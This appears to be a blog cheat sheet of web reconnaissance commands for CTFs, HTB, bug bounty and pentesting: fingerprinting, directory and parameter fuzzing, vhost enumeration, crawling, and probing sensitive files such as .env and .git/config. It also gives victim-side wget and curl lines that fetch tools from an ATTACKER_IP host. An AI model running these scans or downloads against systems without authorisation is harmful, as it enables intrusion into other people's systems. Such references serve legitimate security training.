Go back

Web Attack Surface & Enumeration Cheatsheet

A practical cheat sheet for fast web attack surface discovery and enumeration during HTB, CTFs, bug bounty and offensive security engagements.

0. ESSENTIAL ENUMERATION TOOLS & RESOURCES

Core Tools

Useful Wordlists

0.1 QUICK FILE TRANSFER COMMANDS (upload tools to target)

Attacker: Host files


python3 -m http.server 8000

Victim: Download tools


wget http://ATTACKER_IP:8000/tool
curl -O http://ATTACKER_IP:8000/tool

1. BASIC RECON & FINGERPRINTING

Identify tech, server & framework


whatweb [http://TARGET](http://TARGET)

HTTP headers


curl -I [http://TARGET](http://TARGET)

Full response


curl -v [http://TARGET](http://TARGET)

Nmap HTTP enumeration


nmap -sV --script=http-enum,http-headers,http-methods -p80,443 TARGET

CMS detection


whatweb --log-verbose=out.txt [http://TARGET](http://TARGET)

2. DIRECTORIES & FILE DISCOVERY

Gobuster (directory brute-force)


gobuster dir -u [http://TARGET](http://TARGET) -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50

Feroxbuster (recursive)


feroxbuster -u [http://TARGET](http://TARGET) -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 50

FFUF (fast and powerful)


ffuf -u [http://TARGET/FUZZ](http://TARGET/FUZZ) -w /usr/share/seclists/Discovery/Web-Content/common.txt

File extensions


ffuf -u [http://TARGET/FUZZ](http://TARGET/FUZZ) -w extlist.txt -e .php,.asp,.aspx,.js,.html,.bak

3. PARAMETER DISCOVERY (GET/POST)

FFUF – Parameter fuzzing


ffuf -u "[http://TARGET/page.php?FUZZ=test](http://TARGET/page.php?FUZZ=test)" -w /usr/share/seclists/Discovery/Web-Content/burpsuite-params.txt

WFuzz


wfuzz -u "[http://TARGET/page.php?FUZZ=value](http://TARGET/page.php?FUZZ=value)" -w /usr/share/seclists/Discovery/Web-Content/burp-params.txt --hh 0

Fuzz POST parameters


ffuf -X POST -d "FUZZ=value" -u [http://TARGET/api](http://TARGET/api) -w params.txt

4. VIRTUAL HOST ENUMERATION (VHOSTS)

Fuzz the Host header


ffuf -w subdomains.txt -u [http://TARGET](http://TARGET) -H "Host: FUZZ.target.com"

Identify hidden admin panels across vhosts

Look for:

5. CRAWLING & CONTENT DISCOVERY

Katana (project discovery)


katana -u [http://TARGET](http://TARGET) -o urls.txt

Hakrawler


hakrawler -url [http://TARGET](http://TARGET) -depth 3 -plain > endpoints.txt

Gau (extract archived URLs)


gau TARGET --o urls.txt

Combine with HTTPX to filter live URLs


cat urls.txt | httpx -silent > alive.txt

6. CHECKING HTTP METHODS & MISCONFIGURATIONS

Check supported HTTP methods


curl -X OPTIONS [http://TARGET](http://TARGET) -v

Look for:

Test WebDAV (if PUT is enabled)


davtest -url [http://TARGET](http://TARGET)

7. COMMON SENSITIVE FILES TO CHECK

Try accessing:


/robots.txt
/sitemap.xml
/phpinfo.php
/server-status
/admin
/backup
/.git/
/.git/config
/.env
/config.php
/.DS_Store

Look for:

8. JAVASCRIPT ENUMERATION

Extract JavaScript files automatically


grep -oP '(?<=src=")[^"]*' index.html

Manually inspect:

9. TECHNOLOGY & PLATFORM-SPECIFIC ENUMERATION

PHP

Node.js

Python Django/Flask

ASP.NET / IIS

Java / Spring

10. TLS/SSL ENUMERATION

SSLScan


sslscan TARGET

Test weak ciphers


nmap --script ssl-enum-ciphers -p 443 TARGET

11. AUTOMATING ENUMERATION PIPELINES

Basic pipeline example


httpx -l hosts.txt -silent | tee live.txt
feroxbuster -u [http://TARGET](http://TARGET) -t 50 -w common.txt -q -o dirs.txt
katana -u [http://TARGET](http://TARGET) -o urls.txt
gau TARGET | tee archived.txt

Combine output for exploitation


cat urls.txt archived.txt dirs.txt | sort -u > all-endpoints.txt

Final Notes

This cheat sheet covers the essential phases of web attack surface mapping:

Use it for HTB, CTFs, bug bounty recon, and real-world web pentesting.

Share this post on:
Share this post via WhatsAppShare this post on FacebookShare this post on XShare this post via TelegramShare this post on PinterestShare this post via email
Previous Post
Web Exploitation Cheatsheet
Next Post
Password Attacks & Credential Hunting Cheatsheet